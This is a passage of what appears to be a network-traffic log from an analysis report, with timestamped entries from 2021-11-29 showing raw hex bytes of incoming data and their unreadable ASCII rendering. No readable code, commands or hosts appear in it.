                                              2021-11-29 10:29:51 UTC83INData Raw: 78 0d 22 c0 9f 75 99 81 66 4b 94 5c 4f 1c 25 30 2d f7 58 e4 49 20 51 21 9b 26 48 73 5c 23 14 ca ef 9b 5d b1 15 b0 76 66 0e fb 6e 3e 87 c6 6b 53 5f 83 28 6b 5c 68 ea d9 ce b7 8b 8e e0 f1 b8 87 12 35 e2 d7 22 2f 23 d7 05 1b e6 59 ab fb a1 4e 27 bf b8 bb ec 8a cc b4 10 ce e5 fb f7 f8 44 3f c8 9a 4d 9b 8e d8 41 f8 31 b3 03 1f 6a bb 37 7a 81 3e 69 b1 5d 4c a1 ee 03 65 5a 96 28 f0 4d d3 8f 75 39 b8 a6 ed 0b 4e af 9a 62 e5 38 6f 92 e0 05 c8 8f 6d e8 5f 50 a1 18 24 5c 9d 93 bf 17 24 13 2c ce dc cc e5 7e ff 9a 74 f5 9c 6a bb 96 2c ac e0 cc 4b 51 92 cd 6d 43 7c 15 7c 8b d7 87 79 7a 96 79 fe a9 bf 42 87 be 15 a2 8e 3f e9 b9 f7 7f ec a9 66 e1 43 37 fc 07 2d c3 d2 8b 45 f7 e9 98 e3 e5 76 9f 4c d1 83 16 f3 6f df a9 db 75 2f 4b 9d a9 74 90 0b 50 29 af 66 d4 7a d0 57 6a
                                              Data Ascii: x"ufK\O%0-XI Q!&Hs\#]vfn>kS_(k\h5"/#YN'D?MA1j7z>i]LeZ(Mu9Nb8om_P$\$,~tj,KQmC||yzyB?fC7-EvLou/KtP)fzWj
                                              2021-11-29 10:29:51 UTC84INData Raw: 32 53 e1 09 d3 39 f9 34 8b 06 fd ab ad b3 96 17 21 be 4a 6d 2a 54 4b 80 2a eb 35 0b 12 a9 76 13 a9 c8 8b 4c 28 20 61 d3 e6 10 e1 be 1d a8 1c 2c 0a 9c e3 91 41 d5 18 43 bf 73 47 39 aa f8 10 f7 45 e6 02 e2 b8 83 c8 f0 cd 2c 1d fc 46 95 f8 bb 2a fb fd 65 66 10 ac 4d f4 d8 5a 9d f3 52 38 3e 55 36 28 85 07 cd b0 03 ca b3 aa c9 d4 10 7b 25 60 16 b3 fd b5 32 88 0a 27 77 84 2d 4b 66 c6 f9 10 1e 1d d4 bb e6 b4 bb e1 9b 18 83 2b 29 6c 08 dc c5 d7 13 19 d9 d1 9d ad c1 e1 bf d7 ac f5 4c e4 98 22 46 12 b2 f3 b5 37 03 d8 36 54 07 7a 33 8a 75 78 5f 88 44 55 60 15 35 e3 42 25 e4 78 3d f2 28 72 78 da cd 0c 17 51 f6 47 7d 13 93 e9 8b fd 78 d8 44 0a 6a 24 9c 35 61 ab 90 44 a2 5e 9b f3 2f 01 fc c9 23 ae b3 d0 c5 50 81 eb 41 b9 be 1e 0f a3 af be 5d 24 f9 bc d2 b3 e8 78 2b 2b
                                              Data Ascii: 2S94!Jm*TK*5vL( a,ACsG9E,F*efMZR8>U6({%`2'w-Kf+)lL"F76Tz3ux_DU`5B%x=(rxQG}xDj$5aD^/#PA]$x++
                                              2021-11-29 10:29:51 UTC86INData Raw: 27 eb 61 83 54 f9 13 1c d5 f6 7f 9d 5f de ee d6 f0 43 e5 a9 da 11 9c 76 9d a3 5d c6 21 a1 22 a6 7a 7b 71 ef 55 6a a2 0c fc f4 7e c9 ca de 48 cd c6 55 25 97 e8 f0 c7 05 72 09 a6 72 c8 94 fc d3 1c 56 61 b9 3e c7 1a d3 e2 37 3f e4 bc 2b 18 ca e8 ac 2e c9 dd 85 a7 a3 44 f2 f6 a3 bb 96 7d 2f 82 aa b2 65 03 f5 ae ed 6f a8 1a 12 f9 79 54 38 25 50 01 fa 8d cb de 8e c4 01 3b 85 0d bf f4 00 ba 78 43 23 a3 15 b1 46 e6 61 24 2f 2a 77 c8 f0 8b f9 82 56 e8 be 29 88 1a 1b 12 7a 60 15 90 56 1e 95 eb 3b ed 6e 80 52 ba da ab 83 8f 08 6c c9 a8 c1 04 88 9f 3f ac f0 7b b3 2c 34 f7 65 7f 38 0a fe 2f 65 f8 19 cd e0 26 a4 3d e1 8b bf 0f 59 ac 8a 49 5e dc 36 d3 4d c3 05 35 16 ab 5d ea c1 89 94 7c 07 b4 ea b9 eb cc 14 50 38 30 23 7e d1 8b e0 71 f8 cb f6 ca 33 db 36 2d d9 27 10 b6
                                              Data Ascii: 'aT_Cv]!"z{qUj~HU%rrVa>7?+.D}/eoyT8%P;xC#Fa$/*wV)z`V;nRl?{,4e8/e&=YI^6M5]|P80#~q36-'
                                              2021-11-29 10:29:51 UTC87INData Raw: f1 a5 86 bc 2f 4d 98 e4 3d 1d f4 c7 3c a2 f1 2e d5 73 9c 84 ba 80 0c e4 c8 8e 83 be 46 0b bb af ac b4 f9 77 82 03 49 41 5f e8 3d f4 e4 be ba 2b c2 b6 fb ff b7 29 a2 c4 f6 16 9e 33 c4 d9 f9 78 2f b0 8e 96 c9 bc 18 ee c1 7c 89 bd b0 94 6c 9e 99 00 d5 6b 5d 65 76 18 31 33 2b 2a ad 60 7d 5c 0b a3 e2 48 79 d4 4d a3 dd 34 a6 54 aa 3d d0 b0 66 07 e6 bc 7a a9 b9 b6 79 45 8a a6 d5 46 94 e9 8e 07 af 86 8a 9d 6b 46 86 3f 2e 9b 67 e4 2f 27 5d b5 06 f9 d9 ab fa a9 39 34 3e b8 b1 c4 fe d4 b3 30 c5 3e 76 d4 ee ba 3c cc d3 58 96 84 a5 7e 06 30 84 7c ff 68 90 b7 56 85 ea 6a 9e 0f 7d 3e e7 0a 65 fd bc 3b c0 49 ae f4 74 39 bc 03 e5 23 05 b9 89 61 ce cb 7c 94 d8 94 dc 86 77 14 5d 0f 92 1e 27 8c 0f c6 cc 28 27 00 22 fd 8f c7 e5 65 e7 8b 92 2c c3 2f a1 85 2f 84 b1 c7 57 a5 bb
                                              Data Ascii: /M=<.sFwIA_=+)3x/|lk]ev13+*`}\HyM4T=fzyEFkF?.g/']94>0>v<X~0|hVj}>e;It9#a|w]'('"e,//W
                                              2021-11-29 10:29:51 UTC88INData Raw: 01 2a 2f c3 9a ea d0 82 f8 67 fb b5 cc bf 83 c4 e3 52 38 3e 78 05 d1 8b e0 19 fa c4 f7 c0 1b 9c 4f e6 d3 31 54 56 00 75 c4 f9 b4 d3 10 91 b8 37 57 4b 1a 58 eb b0 8a 08 4d 83 4c f3 2c b5 e7 74 db ab ac 16 00 dc 5e 62 2b 0f 51 eb 0a ed ef 88 0b 83 17 f3 f0 ab b3 96 17 00 e9 de 1e 1f 7e 0a 88 02 a1 26 0e 09 ad e1 ac da f7 8b 37 ef 08 21 d5 51 75 fd a6 8b d1 81 16 a5 96 cb d1 41 ae d9 6b fe 75 4e 22 a5 34 09 6a 2a f3 01 99 62 fe 1e f4 dc 25 2a 85 54 9a f2 a8 5e 22 e2 9b 63 3b d6 4b fe d9 50 8c e4 01 14 33 55 2d 0f da 12 33 bb 3e c5 db 61 5a d4 1a 52 68 7d 0e aa da f4 21 87 1f 2f 8c 94 0c d7 5e c0 ee 9e 5a d0 d4 ba ca 30 d5 f4 90 0b 81 96 18 2b 05 a7 1f d8 0c 39 2e c1 b7 72 5f c2 a5 e6 71 91 b9 f7 97 26 46 10 af d4 38 08 2d f9 35 54 06 00 1d 81 e3 6d 7b a2 9c
                                              Data Ascii: */gR8>xO1TVu7WKXML,t^b+Q~&7!QuAkuN"4j*b%*T^"c;KP3U-3>aZRh}!/^Z0+9.r_q&F8-5Tm{
                                              2021-11-29 10:29:51 UTC90INData Raw: 12 43 ae 66 16 5e 76 bf 19 0f 97 11 ac b5 b5 23 11 2c 4f db ed 28 6b f6 8b 9d 79 b7 69 a3 84 36 a6 e0 cf 41 87 5d e5 41 54 da 12 fa a0 c3 93 50 cf be 42 f6 bf 39 6c 83 a1 1d 38 99 ce e8 b8 eb 7b d2 80 23 e9 69 71 32 07 27 ef 11 0a 45 fd c4 82 fa e1 a9 12 48 d8 9d e9 da 08 ed b8 d5 16 82 74 9d b2 08 4a 23 a1 2c ad 17 21 02 d0 53 7b ac 22 ad f2 e4 eb 5f c9 de b4 5b 46 21 8a 16 a3 c1 14 7c 11 b6 da f6 55 01 2c 14 7c 5a 72 3e cd 36 95 6f 1c 35 ed a7 c6 7a a5 6c a9 39 a5 82 fa 09 64 44 f6 ed fb 70 23 12 b8 8c b5 8e b1 02 d9 d9 fc 24 63 1a 38 fd 71 45 3a f3 df 3b ec 86 e2 ed 9d c2 16 cf 86 5a 7b ec 0b be 79 26 e3 a0 39 b9 40 e8 12 1c 35 d4 7c cc b2 a2 fb a3 bc fc 53 91 b7 18 1f 96 e5 0a 17 90 4f 27 81 7d 3d d2 6c 80 50 92 9a b8 95 8e 2a 2f 5f dc e4 f8 89 b9 0d
                                              Data Ascii: Cf^v#,O(kyi6A]ATPB9l8{#iq2'EHtJ#,!S{"_[F!|U,|Zr>6o5zl9dDp#$c8qE:;Z{y&9@5|SO'}=lP*/_
                                              2021-11-29 10:29:51 UTC91INData Raw: cf dd f8 0d 3c 27 d0 3c 8f d0 e8 a4 f5 7e ca 68 f6 97 22 da 36 ad d3 4a 25 28 e8 34 6d b1 71 22 85 f5 71 40 f1 8c 2a 52 18 15 e3 43 25 e4 6b 69 bb 14 cb ee db c7 b3 9b 47 c6 5f 5a c2 86 e6 92 e4 90 ca 7c 0b 7c 33 1f 7a e0 ab 90 42 3d 72 89 e0 06 84 f5 d6 35 ae b5 a3 f6 5d 9e a9 ac b0 83 1f 26 7d c6 96 5f 3b ba b9 ce b6 ef 66 39 8d fe 47 87 80 ee e7 ea 91 ad be 5e b8 f8 2e e5 01 b0 d5 f1 02 3b 1e c3 c8 fd 76 93 d0 bf 85 c7 a7 25 9f 25 6d 8e e1 70 96 6c 95 90 6a 46 b0 4a b5 88 0d 33 33 20 7c a4 60 7d 5c 57 f2 e0 48 68 4b a0 b2 d5 1d ed 43 a7 35 ba 76 09 13 e3 90 35 c4 e6 7f 79 43 98 3b 67 5f 85 ed e3 dd a8 08 39 fe 30 55 90 2d 23 cb 85 f5 28 32 dc 93 9c e8 fe ba fd b0 16 16 30 29 a4 e3 c5 fc 59 3b d2 e2 d3 2a ef ba 34 cc bc 5a 96 84 c2 5b 17 3f 88 d7 27 67
                                              Data Ascii: <'<~h"6J%(4mq"q@*RC%kiG_Z||3zB=r5]&}_;f9G^.;v%%mpljFJ33 |`}\WHhKC5v5yC;g_90U-#(20)Y;*4Z[?'g
                                              2021-11-29 10:29:51 UTC92INData Raw: 8b f9 82 25 f7 3f 80 a0 ce 96 33 52 20 16 83 59 14 86 6c 4d c3 69 0e ef 80 99 bf ab ec 01 74 59 c8 fa 17 8c 83 e9 ef f9 7c 95 32 05 b2 12 40 3c 1b f0 8b 5e fa 19 c6 e0 7c a7 3d e1 f1 f3 9b ee c9 e5 59 5b fc 4b 05 4d d0 31 2f 2d 06 53 ea d0 46 8b 59 e8 a3 d5 ac d1 18 dd 50 38 34 41 4a cc 9f 14 0e 96 db e7 c5 0d 97 3c 3c d6 bf e7 77 24 72 12 7c 81 c6 03 99 c3 f6 5d 5c e0 48 ca 9b d5 19 47 89 5f 82 f0 4b e6 5c da ce 81 12 1b c5 45 6a 49 3a 4c e6 fe c4 83 8c 1d 85 19 f9 90 e7 b1 87 17 37 ba 22 1f 39 5f 73 44 02 ab 37 14 0c b3 64 85 cb fd 96 5b dc 09 0d dd f7 12 f9 ae 05 6c 11 6e 15 8e d8 db 43 c4 18 70 00 70 6b 3b 9b 59 86 40 2a ef 10 e8 b2 ef 14 ef c7 d6 03 ee 5f 8b fe bd f3 f7 e4 84 6c 2f af 75 ed d3 45 93 12 73 07 36 56 34 2e 85 1f 20 bb 2f d0 a2 38 49 2a
                                              Data Ascii: %?3R YlMitY|2@<^|=Y[KM1/-SFYP84AJ<<w$r|]\HG_K\EjI:L7"9_sD7d[lnCppk;Y@*_l/uEs6V4. /8I*
                                              2021-11-29 10:29:51 UTC93INData Raw: 63 03 8a c0 ca ad ea a7 13 7c e6 b8 bb e8 a6 af 6f 3a d2 ec ed 64 95 65 3e e4 9c 35 08 8f d1 5b 04 4b 43 01 34 6c 86 29 06 76 e8 62 b2 3a 15 3c ed 17 6d 38 b3 13 f7 4b d3 35 67 31 bb 04 e5 23 30 b9 89 6d f5 0f 6b 92 e6 2d 76 87 77 10 78 6a bf 1b 0f be 11 ac b5 c9 06 25 00 e2 cf c5 ef 7c ff 8e aa f5 b0 69 23 ad f0 a8 f1 c3 7f 00 92 e1 47 74 6e 10 f7 9c ef 87 78 66 60 42 ed ae 8c d5 82 a1 1c 38 b3 44 35 b8 e1 53 5e 1c 71 31 7c d0 ed 08 34 e0 5d 44 45 fd c5 91 85 2a 7f 9f 59 c9 96 72 e1 4e ed c3 03 62 a3 70 8c a2 62 50 b9 b2 24 ad 17 30 02 d0 53 46 e6 35 ba e7 72 d7 eb 1f da be ff 41 a8 9a c0 b0 c4 11 6c 14 96 47 bb ab f4 fb 8a 7e 21 b1 2f c1 26 ba 5e 35 35 eb b3 30 a8 a5 6c ac 3a db 4c d0 d1 a3 44 fc c1 cf a8 99 77 2f 80 c1 ba 9b 02 db db 94 cd 61 1a 16 d5
                                              Data Ascii: c|o:de>5[KC4l)vb:<m8K5g1#0mk-vwxj%|i#Gtnxf`B8D5S^q1|4]DE*YrNbpbP$0SF5rAlG~!/&^550l:LDw/a
                                              2021-11-29 10:29:51 UTC95INData Raw: 72 cd 28 02 c4 44 94 97 9e 27 e4 e8 8d 76 30 ca 9a fc d9 50 f2 86 70 2b 3b 46 2a 36 97 38 8f b3 2f c7 b3 48 33 d6 10 70 04 49 08 b1 fc da 17 85 15 34 98 89 16 8e 18 c8 ef 9c 2b 72 be b8 ce 8d b6 f0 9a 23 a5 37 33 79 68 b0 d6 d8 06 1b 36 db b7 b5 de 87 91 e4 73 e0 06 9b 95 22 5d 3b 86 f5 5a 3b 07 88 3f 45 08 5e 3f 92 e8 4f 7d e1 9e 3f 2c 79 37 e3 48 03 f5 73 7b b8 0e 8c 4c d8 c7 bf e7 22 d5 54 78 35 93 e8 83 24 95 d7 79 17 79 3b 26 0c 1f 55 6f 4a 03 51 8a f8 06 c9 f0 d6 35 d2 d0 d2 d4 55 b8 be b4 a9 98 03 1f cd ab be 5b 2d 31 a8 dd b3 f8 63 20 17 61 f3 5d 93 f1 dc f5 ba b9 a5 3c c4 f4 bf f9 09 b3 cf dc 31 ee 0d c0 b6 9f 63 45 c9 97 9a cc a7 3b c1 11 7c 83 9f a0 98 68 d2 ad 66 55 4a e6 62 05 26 67 18 25 50 f0 32 29 5e 0b 6f e1 48 79 74 ff b2 d9 22 30 51 b7
                                              Data Ascii: r(D'v0Pp+;F*68/H3pI4+r#73yh6s"];Z;?E^?O}?,y7Hs{L"Tx5$yy;&UoJQ5U[-1c a]<1cE;|hfUJb&g%P2)^oHyt"0Q
                                              2021-11-29 10:29:51 UTC96INData Raw: 96 e3 1f ba ec a5 b7 83 ae 44 83 2c cf 5e 8b 54 a1 44 fc 93 91 be ab 75 3a ad 4a 77 9b 02 e8 d2 c7 3a 63 1a 14 8e 26 44 3c f9 a5 28 f9 f0 16 f6 9d c1 03 35 fa 96 79 f4 04 94 7e 30 0e 91 16 bb 12 e3 12 1b 2d 2a 7d e0 b2 8a fd a0 ed ff 28 5c b2 30 94 19 52 2a 3b 9b 74 39 80 7d 4e a1 4a 82 58 98 e0 a7 87 ad 8e 75 5f d1 d2 0d a0 bb 15 ec f4 08 9f 27 2d 6b 6c 42 2d 77 15 07 25 fe 1b c2 c6 63 8e 45 eb 82 a3 e4 0c c3 9f 4c 74 d6 4b 05 5e f3 05 2a e7 b8 52 ea d0 86 8b 59 fb 9d d1 a6 e9 bd de 46 45 d8 50 40 d7 89 fc 72 57 c9 f6 c4 19 9d 49 c8 d3 31 54 5d 15 0e f4 76 9e d7 12 b3 c3 a7 56 4b 93 62 e6 98 cc 77 aa 89 4e 8c e8 c6 94 72 dc d2 ef f7 00 d6 4b 68 23 d3 53 eb 04 c7 c0 c5 0a 89 0c f5 f0 9e b3 96 17 55 4d dc 1e 11 54 30 6e 02 ab 33 09 77 ef 6f 85 d0 f5 f2 af
                                              Data Ascii: D,^TDu:Jw:c&D<(5y~0-*}(\0R*;t9}NJXu_'-klB-w%cELtK^*RYFEP@rWI1T]vVKbwNrKh#SUMT0n3wo
                                              2021-11-29 10:29:51 UTC97INData Raw: dd b8 7e 83 9f 82 ea 6e 94 8b 63 4c 79 58 63 14 23 24 cd 20 78 ec 7a 6e 53 23 f1 e5 52 8d 59 81 a9 db 32 d7 a9 a7 3f af 60 75 02 e2 81 3a b6 3c 7c 55 4c 86 47 1f 49 96 e1 eb df aa 86 9f ec f5 4f 78 3f 00 ea a5 8b 52 21 d3 08 95 cc ca ae fb b0 14 19 c1 b9 97 fb a3 f1 4d 3d 64 e9 fb f8 9d c1 3c e4 92 29 ea 8c d1 57 0b 2f 96 12 31 68 81 b6 6b 68 e9 4e b5 42 6e 3b ed 0c b6 6f 9c c5 c1 67 d1 14 71 01 97 ea 12 f4 75 a7 8b 70 ed d8 6f a9 e0 05 d9 4b 77 16 4f 68 a7 08 2d 85 17 d8 28 17 25 01 3b d1 dd c1 cd 21 f7 8d 80 e5 b4 63 8f 82 23 d8 66 c5 57 ae b9 e2 69 2c 7a 03 fa a2 4d 8c a6 62 9b 6a cb a9 b5 59 8e 89 24 2e b1 35 37 b8 e6 7d d0 aa 76 eb 6b 0a fe 27 27 e0 4e 8b 4b 68 c5 93 ff 1c 7d b7 4a d8 9d e2 f0 55 92 b2 de 62 a7 76 8b d4 7e 87 23 a5 2a dc 13 ef 02 da
                                              Data Ascii: ~ncLyXc#$ xznS#RY2?`u:<|ULGIOx?R!M=d<)W/1hkhNBn;ogqupoKwOh-(%;!c#fWi,zMbjY$.57}vk''NKh}JUbv~#*
                                              2021-11-29 10:29:51 UTC98INData Raw: f3 d4 4e b3 bd d0 d0 41 92 af b7 af 6c 16 1b 73 b1 b2 5d 33 a0 51 dc 9f f0 70 37 7e 46 51 5d 97 e6 f8 e4 b2 a7 51 52 85 fc b8 eb 52 b0 c5 f4 11 f2 04 ca d9 fb 7a bb c2 9d 90 e2 72 2c a2 c3 74 99 6b f0 ba 61 93 ff fc 51 6a 57 1e 0a 27 33 37 3a 58 ef 6a 64 a8 22 cc ea 4b 5b d7 ac a3 d7 19 12 58 ab 3f a3 63 98 06 ce 98 4c 10 c3 7d 7f 4e 97 24 62 43 80 15 f4 e0 ad 91 82 e9 e2 59 8c c0 2d cc ae cf 2a 1b 8e fd 75 39 de 81 e8 91 12 07 9e b8 bb ec 75 d4 b3 2b c4 fb ff c6 7c ba 3e e4 98 4b 92 93 2f 5c 2a 3c 97 02 22 40 53 b2 7d 90 e5 7c a5 51 7d 2f e9 05 4d 71 ba 3c c3 5c e0 08 6d 2a bc 15 fc 0f 48 47 88 47 de c2 7c 96 e0 14 dd 9c 89 17 72 79 87 17 3c 95 15 ac ae 13 39 fe 29 f9 c3 c7 fc 69 85 d4 8a f4 ba 65 be 96 21 ac e0 c1 4c 51 92 cd 44 4b 72 1f e3 b0 d7 96 7c
                                              Data Ascii: NAls]3Qp7~FQ]QRRzr,tkaQjW'37:Xjd"K[X?cL}N$bCY-*u9u+|>K/\*<"@S}|Q}/Mq<\m*HGG|ry<9)ie!LQDKr|
                                              2021-11-29 10:29:51 UTC99INData Raw: f9 a4 c3 b9 ff 49 dd 7c 33 36 44 3d dd 8a ea 0b a5 de e5 c5 1b 8f 31 30 2d 30 7c 4b 07 71 69 7a 9f d3 14 fc 49 e5 57 41 09 93 f5 9c c1 14 5e 8c 4e 99 ef aa e8 8e dd f4 88 16 07 d4 34 7a 59 30 57 65 b7 7d 78 e4 8e 8f 68 72 ec 3e b0 96 1b 37 b9 cf 1b 15 47 4e 92 fc aa 1b 04 1a db 7c 84 da f3 9e 77 02 f7 de 2e ff 09 ed a7 9a de 3c 25 f4 97 e7 c4 44 d7 69 65 ff 71 43 5c 25 e0 86 4a 23 29 bb 35 b9 e1 12 e3 c8 28 13 c7 4a 8b 06 ab 09 f4 e0 9c 09 b9 a3 1b 79 b6 89 9c ec 74 34 23 46 22 27 8b 15 2c b8 d1 c0 84 37 5a af 1e 7b 28 7b 61 26 f0 b5 29 8a 0a 34 9a 80 01 49 72 df e2 62 20 31 dc b2 d9 51 b6 fe 9c 18 8e 34 22 7a 11 22 d5 f4 0f 2a 34 d5 b1 b5 d5 f7 b2 18 72 c6 6b dc 92 1a b1 e0 52 2c 61 36 3c c9 3a 45 0b 71 22 83 3b 67 53 f3 9c 42 53 14 35 e7 6f 2e cc b9 79
                                              Data Ascii: I|36D=10-0|KqizIWA^N4zY0We}xhr>7GN|w.<%DieqC\%J#)5(Jyt4#F"',7Z{({a&)4Irb 1Q4"z"*4rkR,a6<:Eq";gSBS5o.y
                                              2021-11-29 10:29:51 UTC100INData Raw: a9 11 ac bf cc 25 00 39 a6 43 c5 e5 65 fa 8f 89 fc df a2 a2 85 23 80 fd c1 5f c0 e6 e1 41 58 29 14 fb 6a c6 83 6c 3d a8 49 22 a3 bd 7f 85 a9 73 79 b1 3f e3 64 e6 7d d0 aa 76 eb 6b 08 fe 01 27 f6 46 8b 4f fd c5 93 fe ed 4f 9a 5d df 9c e8 f2 9f ef b8 ce 60 f3 0f 93 a8 75 82 56 9d 28 af 6d c0 09 f8 79 68 a8 22 cf 75 7c c3 c9 b3 dc ee 96 9e 24 9d c6 ba ed 96 7a 00 b4 e9 93 38 fc d3 1c 72 28 c5 ad cd 32 98 c8 f7 34 ed a3 ae ab a3 03 39 2c cf 52 eb 74 88 79 e4 ef bd 3d 9b 7d 34 9e b0 8b 8a 07 b6 4f ed 14 6b 37 38 ff 21 54 39 fb b0 e0 fb 8d cf da 83 d4 05 20 82 0d 60 f5 00 ba 76 21 18 da 0f ba 57 e7 03 1e 56 0e 7c e0 b4 e6 3d 89 5f f8 0e 48 b1 30 8c 1a 52 2a 3a 2a 82 19 90 7b b6 c4 4b 80 58 89 f5 fe 83 85 0b a8 5d 8b 91 ce 89 95 11 fd f6 14 71 24 2d 67 14 10 41
                                              Data Ascii: %9Ce#_AX)jl=I"sy?d}vk'FOO]`uV(myh"u|$z8r(249,Rty=}4Ok78!T9 `v!WV|=_H0R*:*{KX]q$-gA
                                              2021-11-29 10:29:51 UTC102INData Raw: e9 a5 e2 4a 4b 6b f7 97 3d 5c 0e ab d3 5a 30 30 ed c1 44 22 69 20 f8 ed 66 53 e6 99 b7 f4 a3 1d 79 40 25 ee 6e 65 c6 a9 e3 78 d0 d8 a0 9b 48 d7 45 74 0c 99 18 95 de a4 db 13 17 69 22 1c 58 e3 d1 8d 43 2e 65 f4 21 2f 12 f2 fe aa bf bc da c2 45 f1 06 bf b8 98 08 2b 62 af be 4c 3d a3 a1 23 b2 d5 6f 36 78 47 51 5d 97 ea f0 cc 20 bb af 59 bf ee d0 5a 2f a2 ce eb 1a fe 0b c6 c8 f5 7e 55 3d b0 b8 eb b4 4b a0 c2 7c 87 97 f2 ed 4d 95 81 6b 3e bf 5c 63 03 0e aa 31 21 5e f9 78 12 ff 23 e0 ea 57 62 4b ab a3 cc 33 b5 55 59 3e 87 6c 64 7c ec 91 3f af d4 55 e3 47 8e 22 74 53 f9 42 f5 cc a5 99 96 fa ec 46 97 38 33 f8 52 e5 03 34 d1 79 84 c7 d9 af ed 89 8b 05 3f b2 ad f4 cb 7d b3 3a d8 f7 e2 ed e8 ba 2f e2 87 47 68 8f fd 49 04 4b 91 00 34 6c 99 a5 74 18 5f 0d 1f 55 7d 34
                                              Data Ascii: JKk=\Z00D"i fSy@%nexHEti"XC.e!/E+bL=#o6xGQ] YZ/~U=K|Mk>\c1!^x#WbK3UY>ld|?UG"tSBF83R4y?}:/GhIK4lt_U}4
                                              2021-11-29 10:29:51 UTC103INData Raw: 0e 48 4f be 90 5c 1d 9d 6d 5b d6 6c 91 5c 8d 8d 57 82 a9 3a 76 24 d5 ff 06 8c 8b 9a c7 f2 7b b8 28 24 77 09 10 a6 03 e3 18 6e 66 10 df d3 fb af 24 f7 1e ac 83 f8 5f 96 53 48 4a 42 19 5b 5f 08 37 3b 24 5b fc ce e9 22 59 f9 bf d9 be fa b3 dc 41 3c 2e ae 41 ff a1 e8 74 b4 c8 f6 c4 01 13 1f 2d d3 30 5d 56 07 6c 42 ea 97 c4 0f d8 5f ee 4f 57 82 40 ff 84 51 03 5b 93 21 21 ea b5 ed 6b cf dc 92 05 04 c9 46 94 59 1c 44 e9 7b cb ae 8a 0f 9f 2e 6e 81 ed bb 80 07 47 00 dc 1e 1f 49 41 99 06 ab 26 0f 07 b8 90 84 f6 89 8b 37 2c 09 21 d5 f9 16 65 8c 8b db 22 23 03 80 eb 2e 43 d5 12 f7 f7 66 67 cc a3 e2 86 dc 23 eb 23 1d b2 fe 1e 6c c4 31 22 3d 55 9a f8 36 2c fe c2 64 67 3c a5 e9 f5 c2 7a 62 ec 72 2b ad 5c 3b 07 65 10 33 b1 b3 c8 b5 07 a7 d4 10 7a b4 76 10 80 0d b5 23 87
                                              Data Ascii: HO\m[l\W:v${($wnf$_SHJB[_7;$["YA<.At-0]VlB_OW@Q[!!kFYD{.nGIA&7,!e"#.Cfg##l1"=U6,dg<zbr+\;e3zv#
                                              2021-11-29 10:29:51 UTC104INData Raw: 20 ac a8 e4 a4 c5 bb 21 2c e9 d7 f5 ea d5 b8 e6 98 50 85 8a cd 4e 0e 30 8e 09 2b 7c 6e b2 51 9c ef 64 38 e2 53 26 f2 08 a0 78 96 2a c8 5c 2d 3e 58 3a a0 06 e5 0b 4e b1 96 60 23 db 43 82 e4 03 cf 80 f9 a1 31 27 ac 1c 2d 8d 0e a0 ac 1f 25 11 20 ca d1 3b e4 43 e1 8e da 8f ac 68 a3 81 26 fc 8a de 56 af 97 df 3d 52 78 03 ef ab c4 8f 78 7d b6 5d f5 57 b4 7f 91 a3 67 20 b0 3f ed af f6 24 41 a9 66 e1 67 15 f4 14 2f eb 74 83 5a df 3b 92 d2 fa 7b 8e 59 b7 01 ea f2 49 f0 9b cc 6a a3 65 95 b6 78 78 22 8d 23 a8 7a d3 70 2f a8 95 b7 2a af fe 7e d2 cb d6 ff 40 f8 7b 35 9f bb be c4 05 7c 09 d1 7a b9 ab f4 cc 34 6d 29 bb 2f c5 24 6c e1 1b 36 fa b6 b5 af b4 64 b2 0a 31 59 d4 70 88 41 ce 53 69 57 66 57 3e 9e 85 8b 9b 7e d9 d9 ef f4 61 1a 03 eb 7a 6e 27 f3 d8 3d 04 8c e5 f4
                                              Data Ascii: !,PN0+|nQd8S&x*\->X:N`#C1'-% ;Ch&V=Rxx}]Wg ?$Afg/tZ;{YIjexx"#zp/*~@{5|z4m)/$l6d1YpASiWfW>~azn'=
                                              2021-11-29 10:29:51 UTC106INData Raw: ee f1 9d 78 28 b6 7d fc c8 52 82 fa 8c 2a 1d 58 36 22 85 08 73 df 2e c1 a8 38 4f c7 18 7a 39 77 11 ae 0c b4 0f 96 10 45 95 84 01 5c 62 ae ae f0 de e2 2b a5 c1 94 b2 e1 80 03 94 23 cd 7e 2b c5 d1 db 04 22 2b 06 99 9f d1 e8 af ce db e8 69 fd ea 03 56 1d a9 cc 53 25 27 f9 2e 4d 11 68 dc 82 cf 6b 5b f3 99 07 39 ea ca 1c 5d 39 f7 70 7d b8 08 fb 86 db eb b9 8b c0 60 4e 4d 92 83 e6 94 eb 95 d1 68 08 60 3e e6 5b cc a7 93 4a 36 b7 b3 78 2c 12 fe dc 2e ae b4 d0 c5 57 81 a5 41 b9 be 1b 26 75 be fe 30 3b bc af c2 b8 ea 7f 34 12 41 4d a3 92 d7 f3 e3 ad 8a f2 4d ba fe bf e2 27 bd dc 0a 14 c1 14 c3 da fb 7e 51 15 99 af c8 b6 3a 86 6b 7e 83 9f 8c b5 6d 94 85 70 48 79 55 63 14 2e 2c 38 df 55 c3 6b 74 49 3b d7 ca 57 7f 4b a5 a3 cc 3d b5 53 59 3e 87 6f 63 04 ea 8f 23 7d ea
                                              Data Ascii: x(}R*X6"s.8Oz9wE\b+#~+"+iVS%'.Mhk[9]9p}`NMh`>[J6x,.WA&u0;4AMM'~Q:k~mpHyUc.,8UktI;WK=SY>oc#}
                                              2021-11-29 10:29:51 UTC107INData Raw: ab a2 37 58 f8 73 8b 77 f7 e9 9f aa e2 73 3f 8d b1 e7 06 00 d9 d3 63 85 61 1a 13 eb 59 d9 3d f3 d5 06 fe 9b c3 28 ee c7 10 39 fa 67 78 f4 04 bc 6f 34 0a cb cf 0c 40 35 9f 30 2d 2a 7c 9d a0 88 f9 8c 5d 85 26 5b b7 1c 12 0e 3d b0 15 90 56 31 80 06 46 d3 6c 84 5a e9 8a a8 83 81 17 65 5b 6c 91 5d 88 95 1d ca f0 00 b7 24 2d 65 1f 56 55 9a f6 07 2f dc 0e cd 16 45 a4 46 e5 83 a5 9d 81 45 9d 48 54 c0 21 38 25 3d fe d5 f3 b4 7a dd d0 86 81 71 c1 b5 c6 ac 37 b7 ca 7a 3e 1e 11 5c d3 8b ea 0f ba c9 e4 c0 1b 9e 82 2c d3 31 98 5e 11 73 1e 76 9e d3 0a 93 c3 e6 44 7b 1c 49 ce 98 cd 0a 45 89 4e 99 fc be cc 6b dc df 85 ea 01 fa 4d 72 53 30 54 fd fe c4 83 88 1c 82 06 f0 9b 13 b0 ba 1f 03 ab f7 fd 17 2d 51 8b 02 af 1d 71 1a 88 79 85 da fd 8b 53 38 20 9a d1 e6 10 c0 47 8f db
                                              Data Ascii: 7Xsws?caY=(9gxo4@50-*|]&[=V1FlZe[l]$-eVU/EFEHT!8%=zq7z>\,1^svD{IENkMrS0T-QqyS8 G
